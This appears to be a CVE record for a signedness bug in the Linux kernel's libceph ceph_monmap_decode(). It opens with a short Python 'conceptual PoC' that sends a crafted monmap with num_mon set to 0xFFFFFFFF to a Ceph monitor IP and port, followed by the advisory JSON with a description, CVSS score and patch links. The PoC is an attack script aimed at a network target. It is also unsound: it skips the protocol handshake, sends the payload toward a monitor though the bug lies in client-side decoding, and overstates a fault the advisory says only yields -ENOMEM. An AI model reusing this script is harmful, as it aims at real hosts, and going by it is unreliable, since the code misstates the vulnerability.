CVE-2026-43405

# Conceptual PoC for triggering the integer overflow in ceph_monmap_decode import socket import struct # Target IP and Port (Hypothetical Ceph Monitor port) target_ip = "192.168.1.100" target_port = 6789 # The vulnerability is triggered by sending a crafted monmap # where the 'num_mon' field is a very large u32 value. # If num_mon is set to 0xFFFFFFFF, it becomes -1 in a signed int. bad_num_mon = 0xFFFFFFFF # Max u32, interpreted as -1 in signed int # Constructing a simplified payload representing the monmap structure # struct ceph_monmap { __le32 epoch; __le32 num_mon; ... } # We set num_mon to the malicious value payload = struct.pack("<II", 1, bad_num_mon) try: # Sending the malicious payload to the target # Note: Actual exploitation requires a valid Ceph protocol handshake s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) s.send(payload) print("[+] Malicious packet sent to trigger memory allocation failure.") s.close() except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-43405", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:52.013", "lastModified": "2026-05-11T08:16:13.147", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: Use u32 for non-negative values in ceph_monmap_decode()\n\nThis patch fixes unnecessary implicit conversions that change signedness\nof blob_len and num_mon in ceph_monmap_decode().\nCurrently blob_len and num_mon are (signed) int variables. They are used\nto hold values that are always non-negative and get assigned in\nceph_decode_32_safe(), which is meant to assign u32 values. Both\nvariables are subsequently used as unsigned values, and the value of\nnum_mon is further assigned to monmap->num_mon, which is of type u32.\nTherefore, both variables should be of type u32. This is especially\nrelevant for num_mon. If the value read from the incoming message is\nvery large, it is interpreted as a negative value, and the check for\nnum_mon > CEPH_MAX_MON does not catch it. This leads to the attempt to\nallocate a very large chunk of memory for monmap, which will most likely\nfail. In this case, an unnecessary attempt to allocate memory is\nperformed, and -ENOMEM is returned instead of -EINVAL."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://git.kernel.org/stable/c/08bc6173fd611ad5a40f472bf5f15b92aea0fe40", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5f2806684b05bd24d05c091083b8e2517ba8ffac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/770444611f047dbfd4517ec0bc1b179d40c2f346", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/86f7060cd638d6eb042e8ed780fb83a59ca0dcb3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/b268984ae88cb0dcd7a8e8263962c748448e26e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ba0a4df8c563536857dcbf7b4dbd0f2a15f57ace", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ee5588e2bc41acb73f6676c0520420c107cd0140", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}